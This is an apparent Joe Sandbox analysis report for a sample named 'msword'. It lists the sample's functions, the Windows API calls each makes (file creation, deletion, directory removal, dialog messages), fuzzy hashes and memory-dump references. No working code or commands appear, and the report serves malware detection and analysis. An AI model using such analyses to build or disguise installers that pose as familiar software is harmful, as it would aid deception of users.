Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

N, xrefs: 00404C06
, xrefs: 00404F39
@, xrefs: 00404B90
M, xrefs: 00404B43

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
82D, xrefs: 004046DB
A, xrefs: 00404636
@%F, xrefs: 00404674

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
\*.*, xrefs: 00406D03
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
